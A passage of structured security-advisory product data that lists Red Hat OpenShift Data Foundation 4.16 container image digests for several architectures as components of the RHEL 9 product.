"odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64", }, product_reference: "odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x", }, product_reference: "odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le", }, product_reference: "odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x", }, product_reference: "odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le", }, product_reference: "odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64", }, product_reference: "odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le", }, product_reference: "odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64", }, product_reference: "odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x", }, product_reference: "odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64", }, product_reference: "odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64", }, product_reference: "odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x", }, product_reference: "odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le", }, product_reference: "odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le", }, product_reference: "odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64", }, product_reference: "odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64", }, product_reference: "odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x", }, product_reference: "odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64", }, product_reference: "odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x", }, product_reference: "odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le", }, product_reference: "odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64", }, product_reference: "odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le", }, product_reference: "odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x", }, product_reference: "odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le", }, product_reference: "odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x", }, product_reference: "odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64", }, product_reference: "odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64", }, product_reference: "odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64", }, product_reference: "odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le", }, product_reference: "odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x", }, product_reference: "odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64", }, product_reference: "odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x", }, product_reference: "odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le", }, product_reference: "odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64", }, product_reference: "odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64", }, product_reference: "odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x", }, product_reference: "odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le", }, product_reference: "odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64", }, product_reference: "odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64", }, product_reference: "odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le", }, product_reference: "odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x", }, product_reference: "odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64", }, product_reference: "odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le", }, product_reference: "odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x", }, product_reference: "odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le", }, product_reference: "odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64", }, product_reference: "odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x", }, product_reference: "odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le", }, product_reference: "odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x", }, product_reference: "odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64", }, product_reference: "odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: 